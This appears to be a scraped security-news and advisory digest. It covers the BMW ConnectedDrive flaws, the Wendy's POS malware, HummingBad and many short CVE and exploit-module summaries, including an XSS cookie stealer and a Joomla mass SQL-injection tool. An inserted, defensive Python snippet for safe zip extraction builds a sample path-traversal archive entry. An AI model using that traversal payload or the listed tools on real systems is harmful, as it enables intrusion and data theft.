- Name of Program: BMW web portal vulns pose car hack risk – researchers
- Developer website:
- Thread: High
-
Overview:
Two unpatched vulnerabilities in BMW's ConnectedDrive web portal create a mechanism to manipulate car settings, a security researcher warns.
The first (and more serious) vulnerability creates a means for a hacker to access another driver’s Vehicle Identification Number (VIN) before changing in-car settings such as locking/unlocking the vehicle, accessing email accounts, managing routes and real-time traffic information as managed through BMW's In-Car Infotainment Systems. The second (lesser) issue involves a reflected cross-site scripting bug on BMW’s ConnectedDrive portal password reset webpage.
Both flaws were uncovered by security researcher Benjamin Kunz Mejri of Vulnerability Laboratory, who went public with two advisories (here and here).
El Reg has put in a request for comment on the flaws to BMW but is yet to hear back from the German carmaker. We’ll update this story as and when we hear more.
Kunz Mejri explained: “The VIN ID is connected to the configuration of the cars. After the first login you have to add a valid VIN to access the configuration. The manipulation allows to bypass the validation approval of the VIN and to access your configuration. At the end an attacker is able to fully (unauthorised) access the configuration of another BMW car user.”
The cross-site scripting flaw also needs addressing, according to Kunz Mejri.
“The XSS is at the location of the secure token that is approved for each login requested,” he explained. “An attacker can send a valid token with this payload to exploit the BMW portal account users.” The bug has been estimated to be of medium severity.
The security issues with BMW’s connected car technology follow earlier issues with its kit and come just weeks after security shortcomings in the Mitsubishi Outlander were exposed by security researchers at Pen Test Partners.
Independent security experts argue that a re-think in vehicle security architectures is overdue.
Simon Moffatt, EMEA director of advanced customer engineering at identity and access management firm ForgeRock, commented: “The BMW zero-day vulnerability that allows VIN session hijacking is yet another example of why an identity-centric approach to connected device management is essential in reducing risk and enhancing user experience. As more and more objects join the Internet of Things, high-end items such as connected cars will become increasingly attractive targets for hackers.
“Whilst manufacturers focus on end user experience and device connectivity, there needs to be a more joined-up approach to security, including a strong focus on device, service and user identity management,” he added.
- Additional links:
- Name of Program: Food chain Wendy's hit by massive hack
- Developer website:
- Thread: Low
-
Overview:
Popular US food chain Wendy's has been hit by a massive cyber attack, the company has confirmed.
The company reported suspicious activity earlier this year, but the scale of the breach is far bigger than first anticipated.
At least 1,025 of its restaurants were targeted - with debit and credit card information stolen.
The company did not speculate how many people may have been affected, though it did say all of the locations were in the US.
Malware - malicious software - had been installed on point-of-sale systems in the affected locations.
The chain said it was confident the threat had been removed, and was now offering help to customers who may have been affected.
Help includes the offer of one year of "complimentary" fraud protection services.
Suspicious activity
In a statement outlining the details of the attack, Wendy's said the malware could have been operational in its restaurants from as early as Autumn 2015.
Suspicious activity was noticed in February of this year. The company went public with this discovery in May - saying it believed around 300 restaurants had been affected.
But with the number rising to more than 1,000, this hack ranks as one of the most significant in US history.
The Wendy's hack bears some similarity to the attack on Target in 2013. In that breach, around 40 million customers' details were stolen via malware installed on point-of-sale computers.
Wendy's has blamed a third-party for the intrusion, saying a "service provider" that had remote access to the till systems was compromised.
The company did not say who that service provider was, nor did it explain why it had remote access to the tills of 1,025 of the firm's 5,700 restaurants.
The company has set up a page for customers to check if a restaurant they bought food from has been affected.
'Hungry for burgers'
Security researcher Graham Cluley said it is unlikely that many of those affected will be aware they are at risk.
"For most of us it's not a red letter day if we go to somewhere like Wendy's," he said.
"And people won't have registered which one they went to and where they were in the country when it happened."
He also predicted that while the breach may be embarrassing for the firm in the short term, the company would most likely recover quickly.
"I think the average guy on the street has a fairly short memory when it comes to a data breach.
"When you have the choice of walking to Wendy's which is five yards away, or you walk somewhere else 200 yards away. I think you'll just go to Wendy's.
"I'm pretty sure people will just be hungry for burgers again."
- Additional links:
- Name of Program: Facebook Messenger is getting end-to-end encryption
- Developer website:
- Thread: High
-
Overview:
SOCIAL NETWORK Facebook, a firm not usually commended for its privacy-aware efforts, has revealed that it's started to test end-to-end encryption on the Messenger service.
We first heard murmurs about Facebook planning to boost its security credentials last month. The Guardian reported that Messenger is to get an encrypted communications mode that will hide messages from the prying eyes of authorities and the social network itself.
Facebook has confirmed the rumours, announcing on Friday that it's letting a handful of paranoid users try out an encrypted 'secret conversations' feature in Messenger.
"That means the messages are intended just for you and the other person, not anyone else, including us," an out-of-character Facebook said in a blog post.
Just as The Guardian reported, the feature is available on an opt-in basis. Facebook noted that the feature will allow messages to be read on only one device, and that the "experience may not be right for everyone".
"Starting a secret conversation with someone is optional. That’s because many people want Messenger to work when you switch between devices, such as a tablet, desktop computer or phone," the firm said.
Facebook pointed out that the secret message mode won't support rich content such as GIFs and videos, or making payments. However, it will come with a Snapchat-style timed messages feature, presumably for more inappropriate messages.
"Within a secret conversation, you can also choose to set a timer to control the length of time each message you send remains visible in the conversation," Facebook said.
It's unlikely that Facebook will roll out end-to-end encryption to all Messenger users, much like WhatsApp, because it would get in the way of some of the service's artificial intelligence features, such as the 'bots' that Zuckerberg revealed earlier this year.
Many companies have made the move to end-to-end encryption following Apple's high-profile tussle with the FBI earlier this year. Facebook-owned WhatsApp now enables encryption by default for all one billion-plus users, and Google has included a secure option in the new Allo Messaging app.
However, whistleblower Edward Snowden has warned users of Allo that Google's decision to offer end-to-end encryption by default only if messages are sent in Incognito mode means it's "dangerous" and "unsafe".
"Google's decision to disable end-to-end encryption by default in its new #Allo chat app is dangerous and makes it unsafe. Avoid it for now," he said on Twitter.
- Additional links:
- Name of Program: Malaysia-based credit card fraud ring broken, 105 arrested
- Developer website:
- Thread: Medium
-
Overview:
A total of 105 credit card fraud suspects have been arrested in Asia and Europe following a complex months-long investigation across two continents.
The investigation targeted a gang led from Malaysia whose tentacles spread into 14 European countries (including the UK and Germany) and specialised in using counterfeit credit cards for purchasing of high value goods.
A total of nine arrests took place in Malaysia and 76 across Europe as part of a takedown operation against the group which involved raids against various premises – including two sites where “high quality” counterfeit credit cards were manufactured.
During house searches, 3,000 counterfeit payment cards were also seized, alongside fake passports, cameras, jewellery and substantial amounts of cash.
Cops reckon the crooks used counterfeit credit cards to purchase high value goods, mainly at electronic stores and duty-free shops at airports, causing losses estimated at €5m. In Europe, the gang bought mainly jewellery and expensive watches.
The police operation, which ran from the end of 2015 to the spring of 2016, was supported by Europol's European Cybercrime Centre (EC3). Cops credit close police cooperation on a global level as well as the direct support of American Express with achieving a successful conclusion to the complex investigation.
- Additional links:
- Name of Program: Symantec admits it won't patch 'catastrophic' security flaws until mid-July
- Developer website:
- Thread: High
-
Overview:
SECURITY OUTFIT Symantec has warned customers that security flaws in the firm's systems outed by Google's Project Zero last month won't be fixed until mid-July.
Patches were rushed out to cover some of the "as bad as it gets" flaws identified by Project Zero, but patches to secure the fundamental architectural flaws are still some weeks away.
The cloud-based versions of Symantec's Endpoint Protection Small Business Edition will finally be updated this week, but users of the workstation versions will have to wait weeks.
Symantec has promised updates "by mid-July" and recommended that customers apply them as a matter of urgency, but in the meantime Symantec's systems remain vulnerable.
Project Zero publicised the flaws found in Symantec's Norton Antivirus products last week, after uncovering them in May and reporting them to Symantec.
"These vulnerabilities are as bad as it gets. They don't require any user interaction, they affect the default configuration, and the software runs at the highest privilege levels possible," said Project Zero lead Tavis Ormandy in a blog post.
"In certain cases on Windows, vulnerable code is even loaded into the kernel, resulting in remote kernel memory corruption."
Ormandy criticised Symantec for the flaws, which he suggested were the result of cutting corners. For example, antivirus software typically has dedicated unpackers to get around the problem of software 'packers' that compress executables.
"This causes a problem for antivirus products because it changes how executables look," he said.
"Antivirus vendors solve this problem with two solutions. First, they write dedicated unpackers to reverse the operation of the most common packers, and then use emulation to handle less common and custom packers."
The problem with both of these solutions, according to Ormandy, is that they're hugely complicated and prone to vulnerabilities, making it "extremely challenging" to make such code safe.
"We recommend sandboxing and a security development lifecycle, but vendors will often cut corners here. Because of this, unpackers and emulators continue to be a huge source of vulnerabilities," he said.
Other security companies have been whacked for cutting corners here, including Comodo, ESET, FireEye and Kaspersky, but Symantec runs its unpackers in the kernel of the operating system.
- Additional links:
- Name of Program: Palo Alto offers $16,000 in looming CTF hack off
- Developer website:
- Thread: Medium
-
Overview:
In eight days, Palo Alto is launching a capture the flag competition offering a total of US$16,000 (£12,340, A$21,245) for the first to complete the six trials.
The first to solve all six challenges will receive US$5,000 (£3,866, A$6,640), and can score six lots of US$1,000 (£773, A$1,328) if they are also the first to complete each individual track. Each track in the CTF, dubbed LabyREnth, will test competitors' abilities in disciplines including reverse engineering, programming, and threat intelligence.
The tracks, designed by Palo Alto's @Unit42's Richard Wartell (@wartortell) will become increasingly difficult over time.
Wartell is a seasoned game master, having created the first FLARE-ON CTF in 2014 during his time at Mandiant, a competition undertaken by 7140 participants.
Team director Ryan Olson warns punters should expect challenges over many different mediums and architectures.
It is the first CTF for Unit42 and will end a month after kick off on 14 August.
A pre-game challenge has this week been solved: binary strings littered the CTF homepage which, when decoded, referenced a dusty meme of 4Chan fame:
“For reals yall. Has anyone really been far as decided to use XOR even go want to do look more like? You’ve got to even have been kidding me with this PAN. I’ve been further even more decided to use even go need to do look more as anyone can for Rules and even more than Prizes have been the Overviews. Can you really be far from Ordering even as decided half as much to use Digits go wish for that?”
- Additional links:
- Name of Program: WikiLeaks downed in apparent heavyweight hacker feud
- Developer website:
- Thread: Medium
-
Overview:
WHISTLEBLOWING DOCUMENT FOUNTAIN WikiLeaks was knocked offline for two hours as part of a war between two rival hacking groups, according to online reports.
The groups have been identified as the infamous Anonymous, or at least the YourAnonNews part of it, and the nefarious OurMine.
Anonymous is the Hydra that grew along with WikiLeaks as a protest group, while OurMine represents itself as offering a serious security service that specialises in exposing high-profile targets and their weaknesses.
OurMine's successful smashes include attacks on Google's Sundar Pichai and Facebook's Mark Zuckerberg.
Online reports claimed that the two groups have a beef that stretches back to 2015, and that OurMine is reacting to a public doxing by Anonymous following an earlier dispute over WikiLeaks and a DDoS attack.
The rivalry, a lot of which played out on Twitter, is still going on. News site The Next Web said that OurMine took out WikiLeaks in revenge.
BuzzFeed has screenshots of a direct message exchange between OurMine and WikiLeaks in which the target site offered the hacker group some advice on more effective account breaking.
A WikiLeaks Twitter admin suggested that OurMine's attacks on Zuckerberg and Pichai should have gone further. The attacks were "a huge waste" and "there's a lot more that could have been done with those accounts, e.g. sending DMs as Zuckerberg to further access elsewhere. Same with the Google CEO."
OurMine's tweeter agreed that this was a great idea.
The group's website gives the impression of a friendly service that should give companies confidence in their own systems.
"We scan the whole company websites and staffs and give you the weaknesses and how to fix it. We scan your website to find vulnerability and how to fix it," the group claims, adding that a money back guarantee is available.
OurMine is also a dab hand at exposing people. It's a skill it shares with WikiLeaks founder Julian Assange, a man with a lot of time on his hands and who could possibly be running the Twitter account from his Ecuadorian quarters.
- Additional links:
- Name of Program: New Mac malware discovered in the wild installing backdoors
- Developer website:
- Thread: Low
-
Overview:
A new piece of nasty malware targeting Mac systems has been discovered in the wild, allowing attackers to hijack users' computers.
Dubbed Backdoor.MAC.Eleanor by security researchers at antivirus vendor Bitdefender, the malware installs a backdoor that allows attackers full access to Mac systems, including users' data and control of their webcam. The malware installs itself under the guise of Easy Doc Converter.app, a fake file converter application available for download from reputable sites for Mac software, Bitdefender warned.
The rogue application installs a component that allows attackers to remotely and anonymously access the infected system's command-and-control center. Another component allows attackers to view, edit, rename, delete, upload, download and archive files. They can also execute commands and scripts.
The malware uses a tool named "wacaw" to capture images and videos from built-in webcams, Bitdefender warned.
However, the app is not digitally signed by an Apple-approved certificate, meaning Macs with Apple's Gatekeeper security package enabled will be protected.
- Additional links:
- Name of Program: HPE rushes out patch for more than a year of OpenSSL vulns
- Developer website:
- Thread: Low
-
Overview:
HP Enterprise has popped into its Tardis, and gone back in time to patch OpenSSL bugs dating back to 2014 – including the infamous Logjam bug.
The bugs are in various network products: Intelligent Management Center (iMC), the VCX unified communications products, and the Comware network operating system.
The company's notice cites Common Vulnerabilities and Exposures (CVE) advisories CVE-2014-8176, CVE-2015-1788, CVE-2015-1789, CVE-2015-1790, CVE-2015-1791, CVE-2015-1792, and CVE-2015-1793.
Most of those are Logjam-related; the last is an alternate chains certificate forgery bug. The 2014 CVE was reported in March of that year, but its association with Logjam didn't emerge until June 2015.
Logjam was described by security researchers in May 2015, and rolling out patches has been a long, slow slog for vendors.
- Additional links:
- Name of Program: 'Double speak' squawk users as Silent Circle kills warrant canary
- Developer website:
- Thread: Medium
-
Overview:
Silent Circle has quietly euthanized its warrant canary for 'business reasons' leading privacy pundits to freak out over double negatives and double speak.
The much-loved privacy company offers the hardened BlackPhone geared to business folks who want to frustrate the surveillance state and criminals.
Like others, its warrant canary was designed to sing if Silent Circle was served with a warrant for user data. A sentence saying that no warrant has been received is removed when a warrant is served which prohibits the company from notifying users.
The company told TechCrunch the removal of the canary was a "business decision".
Silent Circle’s general counsel Matt Neiderman said the company had "not received a warrant for user data” and that the decision was "not related to any warrant for user data which we have not received”.
Those lines did little to still the nerves of privacy folks.
Writes one: "Nice double negative there, Silent Circle. What does that even mean? They have not received any warrants, or they have not responded to a warrant they haven't received? Huh?"
And another: "'Not related to any warrant they have NOT received' - that doesn't rule out warrants they have received."
Similar confusion was triggered when Silent Circle updated its canary in March last year to add the important line that a warrant had not been received.
Either way, few appear to have checked the canary's pulse. Neiderman says it was killed "some time ago", but there is little to show when that occurred. The Archive.org records mark it as active on 4 March.
The Electronic Frontier Foundation shuttered its dedicated warrant canary site Canary Watch in May citing the size, diversity, and legal problems of warrant canaries.
The latter relates in part to whether a canary would be considered a breach of warrant disclosure, something which remains untested.
- Additional links:
- Name of Program: Android 7.0 Nougat will stop ransomware resetting passwords
- Developer website:
- Thread: High
-
Overview:
ANDROID 7.0 NOUGAT will have added security to prevent malware, especially ransomware, resetting passwords and locking owners out of their device.
The long overdue security measure comes after the Android platform was invaded by a wave of ransomware, particularly Android.Lockdroid.E and its variants, in late 2015.
Dinesh Venkatesan, a principal threat analysis engineer at Symantec, said in a Security Response blog post: "These variants scare victims with a system error GUI and then reset the lockscreen password used to access the device.
"Even users who manage to remove the malware without resetting the device may be unable to use the phone because they won't be able to get around the password the malware sets."
The malware can reset a PIN or pattern-style password in Android by invoking the resetPassword API.
"In order to invoke this method, the calling application must be a device administrator," explained Venkatesan.
"The upcoming Android version ... will introduce a condition so that the invocation of the resetPassword API can only be used to set the password and not to reset the password."
This ensures that malware cannot reset the lockscreen password, as the change is strictly enforced and there is no backward compatibility escape route for the threat.
"Backward compatibility would have allowed malware to reset the lockscreen password even on newer Android versions. With this change, there is no way for the malware to reset the lockscreen password on Android Nougat," Venkatesan said.
However, the measure won't protect people who have not set a password, and who therefore deserve everything they get.
Venkatesan concluded: "The new feature will also affect standalone disinfection utilities, which also depend on the resetPassword() API. A disinfector utility is an automated tool designed to help users whose devices are infected with malware.
"The disinfector should clean the malware [and] reset the arbitrary password set by the threat during its infection routine.
"Before Android Nougat, the disinfector calls the resetPassword() API to achieve this functionality. However, with Android Nougat's new restrictions, the disinfector's ability to call that API is bound to fail."
- Additional links:
- Name of Program: Worried about Brexit? Online scammers are targeting you
- Developer website:
- Thread: Medium
-
Overview:
The advent of a new week brings with it an inventive new scam attack. Online scammers have been found to be preying on the fears of British people in the wake of the EU Referendum to get them to download malicious software onto their devices, according to security researchers. The latest phishing attack exploits Britons' fears about the economy and political turmoil in the wake of the controversial vote.
It comes in the form of an email with a subject line about political uncertainty or economic turmoil, such as "Brexit causes historic market drop". When unsuspecting users open such malicious emails, software is downloaded onto their computers or devices.
Such software is known for spying on users, and stealing personal and financial information.
- Additional links:
- Name of Program: HummingBad malware rips into 10 million Android devices
- Developer website:
- Thread: High
-
Overview:
A GROUP OF Chinese hackers has created a malware campaign that affects 10 million Android devices and pulls in a quarterly criminal haul of $1m.
Security company Check Point has had its eye on the Yingmob gang for five months, describing it as sophisticated, well-staffed, rolling in cash, and a bit of a shit.
The tool of the trade is a piece of malware called HummingBad, and the group works alongside an official advertising analytics company, according to Check Point's From HummingBad to Worse report (PDF).
"HummingBad is a malware Check Point discovered in February 2016 that establishes a persistent rootkit on Android devices, generates fraudulent ad revenue, and installs additional fraudulent apps," Check Point explained in a blog post.
"Yingmob runs alongside a legitimate Chinese advertising analytics company, sharing its resources and technology. The group is highly organised with 25 employees that staff four separate groups responsible for developing HummingBad's malicious components."
The bounderware has parts that look and stink like the YiSpecter problem that went after Apple users and the iOS landscape and mostly affected people in China.
Check Point said that this is no coincidence and that the source is the same, suggesting that the gang is happy to pee on its own doorstep.
"Yingmob uses HummingBad to generate $300,000 a month in fraudulent ad revenue. This steady stream of cash, coupled with a focused organisational structure, proves that cyber criminals can easily become financially self-sufficient," added the firm.
"Emboldened by this independence, Yingmob and groups like it can focus on honing their skills. For example, groups can pool device resources to create powerful botnets, they can create databases of devices to conduct highly targeted attacks, or they can build new streams of revenue by selling access to devices under their control to the highest bidder."
According to the security firm, over 1.6 million devices in China are infected, 1.35 million in India, 285,000 in the USA, over 200,000 in Russia, and around 45,000 in the UK.
While it affects 10 million active devices, Check Point notes that a whopping 85 million devices have been infected by HummingBad during the months it has been running.
- Additional links:
- Name of Program: Over 100 Snooping Tor Nodes Have Been Spying on Dark Web Sites
- Developer website:
- Thread: Low
-
Overview:
Just like the internet generally, not all of the Tor network is safe. Sometimes, people set up malicious exit nodes—the part of the network where a user's traffic joins the rest of the normal web—in order to spy on what users are up to.
But there are other types of nosy nodes too. Researchers have uncovered over 100 malicious hidden service directories (HSDirs): the relays of the network that allow people to visit dark web sites.
Typically, a Tor user reaches out to these HSDirs, which store descriptors for various hidden services, in order to visit whatever dark web site they’re after. At the time of writing, there are over 3,000 nodes with the HSDir flag, according to figures from the Tor Project, the non-profit that maintains the Tor software.
When set up properly, these directories don't record or log the addresses of the services themselves, allowing the dark web sites to, hopefully, remain undiscovered. But sometimes people deliberately modify their HSDir to keep a record of all the sites it spots.
- Additional links:
- Name of Program: Vuln drains energy sector control kit
- Developer website:
- Thread: Medium
-
Overview:
The US industrial control system computer emergency response team (ICS-CERT) has warned of twin flaws in substation control software.
The SICAM Power Automation System contains poorly protected credentials (CVE-2016-5848) and information exposure (CVE-2016-5849) found by Russian researchers Ilya Karpov and Dmitry Sklyarov of Positive Technologies.
The CERT warns lowly hackers could exploit the holes but only with pre-existing local access, greatly limiting the exposure.
"An authenticated local user utilising these vulnerabilities could obtain sensitive information under certain conditions," the CERT warns.
"Impact to individual organisations depends on many factors that are unique to each organisation."
"Siemens has released an update for [CVE-2016-5848] and is working on an update for [CVE-2016-5849]," it says.
"In the meantime, Siemens provides detailed instructions on how to mitigate CVE-2016-5849 for existing installations via the Siemens Energy Customer Support Center."
The company says its SICAM product is used by many in the energy sector and will require updating with admins needing to email the company for patching advice.
- Additional links:
- Name of Program: Samsung M2m1shot Kernel Driver Buffer Overflow
- Developer website:
- Thread: Medium
-
Overview:
The Samsung m2m1shot driver framework is used to provide hardware acceleration for certain media functions, such as JPEG decoding and scaling images. The driver endpoint (/dev/m2m1shot_jpeg) is accessible by the media server. The Samsung S6 Edge is a 64-bit device, so a compatibility layer is used to allow 32-bit processes to provide structures that are expected by the 64-bit driver. There is a stack buffer overflow in the compat ioctl for m2m1shot.
- Additional links:
- Name of Program: Samsung Fimg2d FIMG2D_BITBLT_BLIT Ioctl Concurrency Flaw
- Developer website:
- Thread: High
-
Overview:
The Samsung Graphics 2D driver (/dev/fimg2d) is accessible by unprivileged users/applications. It was found that the ioctl implementation for this driver contains a locking error which can lead to memory errors (such as use-after-free) due to a race condition.
- Additional links:
- Name of Program: Samsung Seiren Kernel Driver Buffer Overflow
- Developer website:
- Thread: High
-
Overview:
The Exynos Seiren Audio driver has a device endpoint (/dev/seiren) that is accessible by either the system user or the audio group (such as the mediaserver). It was found that the write() implementation for this driver contains a buffer overflow vulnerability that overflows a static global buffer.
- Additional links:
- Name of Program: Samsung SecEmailComposer QUICK_REPLY_BACKGROUND Permission Weakness
- Developer website:
- Thread: Low
-
Overview:
The SecEmailComposer/EmailComposer application used by the Samsung S6 Edge has an exported service action to do quick replies to emails. It was found that this action required no permissions to call, and could lead to an unprivileged application gaining access to email content.
- Additional links:
- Name of Program: Samsung WifiHs20UtilityService Path Traversal
- Developer website:
- Thread: Medium
-
Overview:
A path traversal vulnerability was found in the WifiHs20UtilityService. This service is running on a Samsung S6 Edge device, and may be present on other Samsung device models. WifiHs20UtilityService reads any files placed in /sdcard/Download/cred.zip, and unzips this file into /data/bundle. Directory traversal in the path of the zipped contents allows an attacker to write a controlled file to an arbitrary path as the system user.
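The defensive check that the description above implies is missing, as an added example that is not the Samsung service's code: before extracting each archive member, resolve its name under the intended destination and refuse any entry that lands outside it. The archive contents, the destination path /data/bundle taken from the advisory, and the function names are constructed for this illustration.

```python
import io
import os
import zipfile


def build_sample_zip() -> bytes:
    """Constructed sample archive: one benign member and one member whose
    name climbs out of the extraction root with '../' components."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("bundle/config.txt", "harmless")
        zf.writestr("../../etc/evil.conf", "attacker-controlled")
    return buf.getvalue()


def is_safe_member(name: str, dest: str) -> bool:
    """Return True only if `name`, resolved under `dest`, stays inside dest.

    Absolute paths and drive-letter prefixes are rejected outright; everything
    else is joined to the destination and canonicalised (realpath collapses
    '..' segments and follows symlinks), then compared prefix-wise."""
    if name.startswith(("/", "\\")) or (len(name) > 1 and name[1] == ":"):
        return False
    dest_real = os.path.realpath(dest)
    target = os.path.realpath(os.path.join(dest_real, name))
    return target == dest_real or target.startswith(dest_real + os.sep)


def safe_extract(zip_bytes: bytes, dest: str, extract: bool = False):
    """Classify every member of the archive as safe or rejected.

    With extract=True the safe members are written under `dest`; rejected
    members are never touched. Returns (safe_names, rejected_names) so the
    caller can log attempted traversal instead of silently dropping it."""
    safe, rejected = [], []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if is_safe_member(info.filename, dest):
                safe.append(info.filename)
                if extract:
                    zf.extract(info, dest)
            else:
                rejected.append(info.filename)
    return safe, rejected


if __name__ == "__main__":
    # Classify only (extract=False), so this runs without touching /data.
    ok, bad = safe_extract(build_sample_zip(), "/data/bundle")
    print("safe:", ok)
    print("rejected:", bad)
```

A rejected member is the signal worth alerting on: a legitimate bundle has no reason to contain `..` segments or absolute paths.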
- Additional links:
- Name of Program: Red Hat Security Advisory 2015-1945-01
- Developer website:
- Thread: High
-
Overview:
Red Hat Security Advisory 2015-1945-01 - Kubernetes allows orchestration and control of Docker containers as used in OpenShift Enterprise 3. Kubernetes fails to validate object name types before passing the data to etcd. As the etcd service generates keys based on the object name type this can lead to a directory path traversal.
- Additional links:
- Name of Program: Ubuntu Security Notice USN-2783-1
- Developer website:
- Thread: Low
-
Overview:
Ubuntu Security Notice 2783-1 - Aleksis Kauppinen discovered that NTP incorrectly handled certain remote config packets. In a non-default configuration, a remote authenticated attacker could possibly use this issue to cause NTP to crash, resulting in a denial of service. Miroslav Lichvar discovered that NTP incorrectly handled logconfig directives. In a non-default configuration, a remote authenticated attacker could possibly use this issue to cause NTP to crash, resulting in a denial of service. Various other issues were also addressed.
- Additional links:
- Name of Program: Oracle E-Business Suite 12.1.4 Cross Site Scripting
- Developer website:
- Thread: Low
-
Overview:
Oracle E-Business Suite suffers from a cross site scripting vulnerability. Version 12.1.4 is affected.
- Additional links:
- Name of Program: Oracle E-Business Suite 12.2.4 Database User Enumeration
- Developer website:
- Thread: Medium
-
Overview:
There is a script in EBS that connects to the database and displays the connection status. The differing results for existing and non-existing accounts let an attacker enumerate valid database accounts. Version 12.2.4 is affected.
- Additional links:
- Name of Program: Ubuntu Security Notice USN-2782-1
- Developer website:
- Thread: Low
-
Overview:
Ubuntu Security Notice 2782-1 - Gabriel Campana discovered that Apport incorrectly handled Python module imports. A local attacker could use this issue to elevate privileges.
- Additional links:
- Name of Program: Red Hat Security Advisory 2015-1943-01
- Developer website:
- Thread: Medium
-
Overview:
Red Hat Security Advisory 2015-1943-01 - KVM is a full virtualization solution for Linux on AMD64 and Intel 64 systems. The qemu-kvm package provides the user-space component for running virtual machines using KVM. It was found that the QEMU's websocket frame decoder processed incoming frames without limiting resources used to process the header and the payload. An attacker able to access a guest's VNC console could use this flaw to trigger a denial of service on the host by exhausting all available memory and CPU. This issue was discovered by Daniel P. Berrange of Red Hat.
- Additional links:
- Name of Program: Red Hat Security Advisory 2015-1931-01
- Developer website:
- Thread: Medium
-
Overview:
Red Hat Security Advisory 2015-1931-01 - KVM is a full virtualization solution for Linux on AMD64 and Intel 64 systems. The qemu-kvm-rhev package provides the user-space component for running virtual machines using KVM. It was found that the QEMU's websocket frame decoder processed incoming frames without limiting resources used to process the header and the payload. An attacker able to access a guest's VNC console could use this flaw to trigger a denial of service on the host by exhausting all available memory and CPU. This issue was discovered by Daniel P. Berrange of Red Hat.
- Additional links:
- Name of Program: Joomla 3.4.4 SQL Injection
- Developer website:
- Thread: High
-
Overview:
Joomla remote SQL injection mass exploitation tool for the flaw affecting versions 3.2 through 3.4.4.
- Additional links:
- Name of Program: Social Microblogging PRO 1.5 Cross Site Scripting
- Developer website:
- Thread: Medium
-
Overview:
Social Microblogging PRO version 1.5 suffers from a stored cross site scripting vulnerability.
- Additional links:
- Name of Program: Malicious Git And Mercurial HTTP Server For CVE-2014-9390
- Developer website:
- Thread: Medium
-
Overview:
This Metasploit module exploits CVE-2014-9390, which affects Git (versions less than 1.8.5.6, 1.9.5, 2.0.5, 2.1.4 and 2.2.1) and Mercurial (versions less than 3.2.3) and describes three vulnerabilities.
- Additional links:
- Name of Program: Windows ahcache.sys/NtApphelpCacheControl Privilege Escalation
- Developer website:
- Thread: High
-
Overview:
On Windows 8.1 update the system call NtApphelpCacheControl (the code is actually in ahcache.sys) allows application compatibility data to be cached for quick reuse when new processes are created. A normal user can query the cache but cannot add new cached entries as the operation is restricted to administrators. This is checked in the function AhcVerifyAdminContext. This function has a vulnerability where it doesn't correctly check the impersonation token of the caller to determine if the user is an administrator. This is the proof of concept code.
- Additional links:
- Name of Program: Debian Security Advisory 3117-1
- Developer website:
- Thread: Medium
-
Overview:
Debian Linux Security Advisory 3117-1 - Several vulnerabilities were found in PHP, a general-purpose scripting language commonly used for web application development.
- Additional links:
- Name of Program: Cookie Manager 0.5
- Developer website:
- Thread: High
-
Overview:
Cookie Manager is a PHP cookie stealer for use with XSS that collects and manages the captured cookies.
- Additional links:
- Name of Program: Digital Whisper Electronic Magazine #57
- Developer website:
- Thread: Medium
-
Overview:
Digital Whisper Electronic Magazine issue 57. Written in Hebrew.
- Additional links:
- Name of Program: Symantec Web Gateway 5.2.1 OS Command Injection
- Developer website:
- Thread: Medium
-
Overview:
Symantec Web Gateway versions 5.2.1 and below suffer from a remote OS command injection vulnerability.
- Additional links:
- Name of Program: GetSimple CMS 3.3.4 XML External Entity Injection
- Developer website:
- Thread: Medium
-
Overview:
GetSimple CMS versions 3.1.1 through 3.3.4 suffer from an XML external entity injection vulnerability.
- Additional links:
- Name of Program: i-FTP 2.20 Schedule Buffer Overflow
- Developer website:
- Thread: Medium
-
Overview:
This Metasploit module exploits a stack-based buffer overflow vulnerability in i-Ftp version 2.20, caused by a long time value set for scheduled download. By persuading the victim to place a specially-crafted Schedule.xml file in the i-FTP folder, a remote attacker could execute arbitrary code on the system or cause the application to crash. This Metasploit module has been tested successfully on Windows XP SP3.
- Additional links:
- Name of Program: Debian Security Advisory 3116-1
- Developer website:
- Thread: Low
-
Overview:
Debian Linux Security Advisory 3116-1 - It was discovered that a memory leak in parsing X.509 certificates may result in denial of service.
- Additional links:
- Name of Program: Mantis Bug Tracker 1.2.17 PHP Code Injection
- Developer website:
- Thread: Medium
-
Overview:
Mantis Bug Tracker versions 1.2.0 through 1.2.17 suffer from a PHP code injection vulnerability.
- Additional links:
- Name of Program: Ubuntu Security Notice USN-1920-1
- Developer website:
- Thread: Medium
-
Overview:
Ubuntu Security Notice 1920-1 - Kees Cook discovered a format string vulnerability in the Broadcom B43 wireless driver for the Linux kernel. A local user could exploit this flaw to gain administrative privileges.
- Additional links:
- Name of Program: Red Hat Security Advisory 2013-1121-01
- Developer website:
- Thread: Medium
-
Overview:
Red Hat Security Advisory 2013-1121-01 - The sos package contains a set of tools that gather information from system hardware, logs and configuration files. The information can then be used for diagnostic purposes and debugging. The sosreport utility collected the Kickstart configuration file, but did not remove the root user's password from it before adding the file to the resulting archive of debugging information. An attacker able to access the archive could possibly use this flaw to obtain the root user's password. "/root/anaconda-ks.cfg" usually only contains a hash of the password, not the plain text password.
- Additional links:
- Name of Program: Mandriva Linux Security Advisory 2013-203
- Developer website:
- Thread: Medium
-
Overview:
Mandriva Linux Security Advisory 2013-203 - Multiple vulnerabilities have been discovered and corrected in phpmyadmin. Inclusive are cross site scripting, path disclosure, and SQL injection issues.
- Additional links:
- Name of Program: TP-Link TL-SC3171 Command Execution / Shell Upload / Bypass
- Developer website:
- Thread: Medium
-
Overview:
Core Security Technologies Advisory - TP-Link TL-SC3171 IP Cameras suffer from OS command injection, use of hard-coded credentials, authentication bypass, and missing authentication vulnerabilities.
- Additional links:
- Name of Program: Bit51 Better WP Security Plugin XSS / Command Execution
- Developer website:
- Thread: High
-
Overview:
The Better WP Security WordPress plugin suffers from a stored cross site scripting vulnerability, which can be exploited by a remote unauthenticated attacker to steal cookies or gain privileged access to the affected site. Bit51 Better WP Security Plugin versions 3.4.8, 3.4.9, 3.4.10, 3.5.2, and 3.5.3 are affected.
- Additional links:
- Name of Program: Matterdaddy Market 1.4.2 Cross Site Request Forgery / Arbitrary File Upload
- Developer website:
- Thread: High
-
Overview:
Matterdaddy Market version 1.4.2 and below suffers from cross site request forgery and arbitrary file upload vulnerabilities.
- Additional links:
- Name of Program: Show In Browser 0.0.3 Ruby Gem File Injection
- Developer website:
- Thread: Medium
-
Overview:
Show In Browser 0.0.3 is a Ruby Gem that suffers from a file injection vulnerability, allowing arbitrary text to be opened in a browser.
- Additional links:
- Name of Program: AVE.CMS 2.09 Blind SQL Injection
- Developer website:
- Thread: High
-
Overview:
